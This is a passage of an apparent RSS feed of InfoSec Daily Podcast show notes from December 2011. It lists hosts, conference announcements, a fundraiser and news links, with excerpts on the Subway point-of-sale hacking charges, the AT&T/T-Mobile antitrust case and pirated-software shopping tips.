		<link>http://www.isdpodcast.com/episode-543-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-543-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 11 Dec 2011 03:28:51 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3259</guid>
		<description><![CDATA[&#160; Episode 543 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 543 for December 10, 2011. &#160;&#160;Tonight&#039;s podcast is hosted by Dr. b0n3z and Boris Sverdlik. &#160; Guests: Hackett, Warrax, and Spridel. &#160; &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent">
<p><span>Episode 543 &#8211; Weekend Wrap-up with Dr. b0n3z</span><span> </span><br />
		<span>InfoSec Daily Podcast Episode 543 for December 10, 2011. &nbsp;&nbsp;Tonight&#039;s podcast is hosted by Dr. b0n3z and Boris Sverdlik.</span></p>
<p>&nbsp;</p>
<p><span>Guests: Hackett, Warrax, and Spridel.</span></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Announcements:</span></p>
<p><span>Brad Smith (theNurse)</span><br />
		<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p><span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p><a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
		<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p><span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
		<span>When: Starts January 24, 2012</span><br />
		<span>Where: Atlanta, GA</span><br />
		<span>Discount Code:</span><br />
		<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p><span>ShmooCon 2012</span><br />
		<span>When: January 27th-29th, 2012</span><br />
		<span>Registration: January 2nd at Midnight <img src='http://www.isdpodcast.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </span><br />
		<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
		<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a></p>
<p><span>Thotcon 0&#215;3</span><br />
		<span>When: Friday April 27th, 2012</span><br />
		<span>Where: Secret location in Chicago</span><br />
		<a href="http://tickets.thotcon.org/"><span>http://tickets.thotcon.org/</span></a><br />
		<span>Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p><span>Linuxfest Northwest 2012</span><br />
		<span>When: Saturday, April 28th-29th, 2012</span><br />
		<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
		<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
		<span>CFP now open!</span></p>
<p><span>AIDE 2012</span><br />
		<span>When: May 21-25, 2012</span><br />
		<span>Where: MU Forensic Science Center</span><br />
		<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
		<span>CFP now open!</span></p>
<p><span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
		<span>When: &nbsp;September 27-30, 2012</span><br />
		<span>Where: Louisville, KY</span><br />
		<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p><span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></p>
<p><span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Stories</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: &nbsp;</span><a href="http://news.yahoo.com/thwart-porn-colleges-buying-xxx-sites-193653013.html"><span>http://news.yahoo.com/thwart-porn-colleges-buying-xxx-sites-193653013.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source:</span><span> </span><a href="http://www.f-secure.com/weblog/archives/00002279.html"><span>http://www.f-secure.com/weblog/archives/00002279.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: </span><a href="http://www.webpronews.com/sopa-open-2011-12"><span>http://www.webpronews.com/sopa-open-2011-12</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: </span><a href="http://www.computerworld.com/s/article/print/9222518/Microsoft_We_can_remotely_delete_Windows_8_apps"><span>http://www.computerworld.com/s/article/print/9222518/Microsoft_We_can_remotely_delete_Windows_8_apps</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: </span><a href="http://www.securityweek.com/new-research-says-chrome-browser-most-secured-against-attacks"><span>http://www.securityweek.com/new-research-says-chrome-browser-most-secured-against-attacks</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source:</span><span> </span><a href="http://www.securityweek.com/researchers-confirm-attackers-targeted-defense-firms-adobe-reader-zero-day"><span>http://www.securityweek.com/researchers-confirm-attackers-targeted-defense-firms-adobe-reader-zero-day</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source:</span><span> </span><a href="http://paulsparrows.wordpress.com/2011/12/10/another-certification-authority-breached-the-12th/"><span>http://paulsparrows.wordpress.com/2011/12/10/another-certification-authority-breached-the-12th/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: </span><a href="http://linux-news.org/index.php/2011/12/09/top-10-wireshark-filters/"><span>http://linux-news.org/index.php/2011/12/09/top-10-wireshark-filters/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><span>Source: </span><a href="http://www.ajc.com/news/gwinnett/ambulances-turned-away-as-1255750.html"><span>http://www.ajc.com/news/gwinnett/ambulances-turned-away-as-1255750.html</span></a></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-543-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3259/0/infosec-daily-podcast-episode-543.mp3" length="21970188" type="audio/mpeg" />
		<itunes:duration>0:45:46</itunes:duration>
		<itunes:subtitle>&#160;

Episode 543 &#8211; Weekend Wrap-up with Dr. b0n3z 
		InfoSec Daily Podcast Episode 543 for December 10, 2011. &#160;&#160;Tonight&#039;s podcast is hosted by Dr. b0n3z and Boris Sverdlik.
&#160;
Guests: Hackett, Warrax, and Spridel.
&#160;
[...]</itunes:subtitle>
		<itunes:summary>&#160;

Episode 543 &#8211; Weekend Wrap-up with Dr. b0n3z 
		InfoSec Daily Podcast Episode 543 for December 10, 2011. &#160;&#160;Tonight&#039;s podcast is hosted by Dr. b0n3z and Boris Sverdlik.
&#160;
Guests: Hackett, Warrax, and Spridel.
&#160;
&#160;
Announcements:
Brad Smith (theNurse)
		We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
		http://www.social-engineer.org/bradsmithdonation/
SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
		When: Starts January 24, 2012
		Where: Atlanta, GA
		Discount Code:
		http://www.sans.org/mentor/details.php?nid=25484
ShmooCon 2012
		When: January 27th-29th, 2012
		Registration: January 2nd at Midnight  
		Where: Washington Hilton Hotel, Washington, DC
		http://www.shmoocon.org
Thotcon 0&#215;3
		When: Friday April 27th, 2012
		Where: Secret location in Chicago
		http://tickets.thotcon.org/
		Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
Linuxfest Northwest 2012
		When: Saturday, April 28th-29th, 2012
		Where: Bellingham Technical College &#8211; Bellingham, WA
		http://www.linuxfestnorthwest.org/
		CFP now open!
AIDE 2012
		When: May 21-25, 2012
		Where: MU Forensic Science Center
		http://aide.marshall.edu
		CFP now open!
DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
		When: &#160;September 27-30, 2012
		Where: Louisville, KY
		http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
You don't have a sufficient version of Flash Player to display this animation.
Stories
&#160;
Source: &#160;http://news.yahoo.com/thwart-porn-colleges-buying-xxx-sites-193653013.html
&#160;
Source: http://www.f-secure.com/weblog/archives/00002279.html
&#160;
Source: http://www.webpronews.com/sopa-open-2011-12
&#160;
Source: http://www.computerworld.com/s/article/print/9222518/Microsoft_We_can_remotely_delete_Windows_8_apps
&#160;
Source: http://www.securityweek.com/new-research-says-chrome-browser-most-secured-against-attacks
&#160;
Source: http://www.securityweek.com/researchers-confirm-attackers-targeted-defense-firms-adobe-reader-zero-day
&#160;
Source: http://paulsparrows.wordpress.com/2011/12/10/another-certification-authority-breached-the-12th/
&#160;
Source: http://linux-news.org/index.php/2011/12/09/top-10-wireshark-filters/
&#160;
Source: http://www.ajc.com/news/gwinnett/ambulances-turned-away-as-1255750.html
</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 542 &#8211; Subway Skimmers, AT&amp;T&amp;T, How Not to Get Pirated Software, Google IPv6, HBGary and Insecure HP Printers</title>
		<link>http://www.isdpodcast.com/episode-542-subway-skimmers-attt-how-not-to-get-pirated-software-google-ipv6-hbgary-and-insecure-hp-printers</link>
		<comments>http://www.isdpodcast.com/episode-542-subway-skimmers-attt-how-not-to-get-pirated-software-google-ipv6-hbgary-and-insecure-hp-printers#comments</comments>
		<pubDate>Sat, 10 Dec 2011 02:03:34 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3254</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 542 for December 9, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma. Special Guest: Johnny Cocaine &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.9240012016100929" style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 542 for December 9, 2011. &nbsp;&nbsp;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.</span></p>
<p>	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Special Guest: Johnny Cocaine</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.scmagazineus.com/four-charged-with-hacking-subway-other-retailers/article/218702"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.scmagazineus.com/four-charged-with-hacking-subway-other-retailers/article/218702</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Four Romanian nationals have been charged with remotely hijacking the credit card processing systems of more than 150 Subway restaurants in the United States, along with dozens of other unnamed retailers, the federal prosecutors </span><a href="http://www.justice.gov/opa/pr/2011/December/11-crm-1598.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">announced</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Thursday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The defendants, all in their 20s, compromised the credit card data of 80,000 customers and made millions of dollars in unauthorized purchases, according to the U.S. Department of Justice. Starting in 2008 and through May of this year, the defendants hacked into more than 200 U.S.-based merchants&#39; point-of-sale (POS) systems, which are used to process transactions.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The defendants &ndash; Adrian-Tiberiu Oprea, 27, of Constanta; Iulian Dolan, 27, of Craiova; Cezar Iulian Butu, 26, of Ploiesti; and Florin Radu, 23, of Rimnicu Vilcea &ndash; &nbsp;each were charged in New Hampshire with conspiracy to commit computer fraud, wire fraud and access device fraud.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Oprea was arrested last week in Romania and is currently in custody there. Butu and Dolan were both arrested in mid-August upon entering the United States. Radu remains at large.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.infoworld.com/d/the-industry-standard/doj-tells-judge-theres-no-active-att-deal-t-mobile-181379"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/the-industry-standard/doj-tells-judge-theres-no-active-att-deal-t-mobile-181379</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The U.S. Department of Justice will file a motion to stay or dismiss its lawsuit to block AT&amp;T&#39;s acquisition of T-Mobile USA because the agency believes there&#39;s no deal pending, a lawyer for the DOJ said Friday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The DOJ will file the motion on Tuesday in response to AT&amp;T&#39;s decision in November to withdraw its application at the U.S. Federal Communications Commission for the transfer of T-Mobile&#39;s spectrum licenses to AT&amp;T, said Joseph Wayland, the DOJ&#39;s lead attorney in the case. &quot;It&#39;s not a real transaction until they file with the FCC,&quot; Wayland said during a scheduling hearing in the antitrust case.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AT&amp;T withdrew its license transfer application after the FCC announced in November that staff there had found the transaction to be contrary to the public interest. The FCC had planned to send the application to a hearing before an administrative law judge, but AT&amp;T instead withdrew the application.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wayland told Judge Ellen Segal Huvelle of the U.S. District Court for the District of Columbia that the DOJ would proceed with its case after AT&amp;T refiles its application at the FCC. Huvelle has scheduled a hearing on the DOJ&#39;s motion to stay or dismiss the case for Thursday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.eweek.com/c/a/Security/10-Holiday-Shopping-Tips-to-Avoid-Buying-Pirated-Software-351045"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.eweek.com/c/a/Security/10-Holiday-Shopping-Tips-to-Avoid-Buying-Pirated-Software-351045</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Most people are being especially cost-conscious this holiday season and cut-rate prices always capture attention. However, if you want to gift your friends and family members with software and related products, take an extra minute and look beyond the price if it looks like &quot;too good&quot; a deal. The </span><a href="http://www.siia.net/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Software &amp; Information Industry Association</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the principal trade association for the software and digital content industries, conducts an aggressive anti-piracy campaign each year, based on balancing enforcement with education. 